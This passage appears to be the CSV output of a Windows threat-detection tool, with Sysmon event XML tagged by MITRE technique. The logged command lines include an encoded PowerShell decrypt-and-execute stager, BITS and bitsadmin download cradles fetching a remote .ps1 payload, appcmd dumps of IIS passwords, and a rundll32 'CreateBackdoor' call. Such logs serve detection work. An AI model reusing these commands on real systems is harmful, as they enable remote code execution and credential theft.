<Data Name=""ParentImage"">C:\Windows\System32\dllhost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920560.43525,2019-05-27T05:29:20.435250+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;. )&quot; /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:20.435250Z"">
</TimeCreated>
<EventRecordID>5988</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:20.375</Data>
<Data Name=""ProcessGuid"">365ABB72-3D70-5CEB-0000-001032EAFF00</Data>
<Data Name=""ProcessId"">1004</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;. )&quot; /text:userName</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1197] BITS Jobs - Process,1564435983.886611,2019-07-30T01:33:03.886611+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:03.254713Z"">
</TimeCreated>
<EventRecordID>4893</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:03.238</Data>
<Data Name=""ProcessGuid"">747F3D96-660F-5D3F-0000-001055378600</Data>
<Data Name=""ProcessId"">2948</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435983.886611,2019-07-30T01:33:03.886611+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:03.254713Z"">
</TimeCreated>
<EventRecordID>4893</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:03.238</Data>
<Data Name=""ProcessGuid"">747F3D96-660F-5D3F-0000-001055378600</Data>
<Data Name=""ProcessId"">2948</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920560.305063,2019-05-27T05:29:20.305063+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:20.305063Z"">
</TimeCreated>
<EventRecordID>5985</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:20.265</Data>
<Data Name=""ProcessGuid"">365ABB72-3D70-5CEB-0000-001072E6FF00</Data>
<Data Name=""ProcessId"">2640</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435983.254713,2019-07-30T01:33:03.254713+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c bitsadmin.exe /transfer &quot;JobName&quot; https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt &quot;C:\Windows\system32\Default_File_Path.ps1&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:03.193387Z"">
</TimeCreated>
<EventRecordID>4892</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:03.184</Data>
<Data Name=""ProcessGuid"">747F3D96-660F-5D3F-0000-00109B328600</Data>
<Data Name=""ProcessId"">6020</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c bitsadmin.exe /transfer &quot;JobName&quot; https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt &quot;C:\Windows\system32\Default_File_Path.ps1&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553017268.977707,2019-03-19T21:41:08.977707+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.EXE /c malwr.vbs ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T17:41:08.967692Z"">
</TimeCreated>
<EventRecordID>1966184</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1168"" ThreadID=""604"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 17:41:08.947</Data>
<Data Name=""ProcessGuid"">365ABB72-29B4-5C91-0000-0010289AC308</Data>
<Data Name=""ProcessId"">3748</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.EXE /c malwr.vbs</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-2209-5C91-0000-0020FA479E03</Data>
<Data Name=""LogonId"">0x39e47fa</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1A4A-5C91-0000-0010455A0000</Data>
<Data Name=""ParentProcessId"">512</Data>
<Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:17.992377Z"">
</TimeCreated>
<EventRecordID>243514</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.511</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-0010736B1E00</Data>
<Data Name=""ProcessId"">8116</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
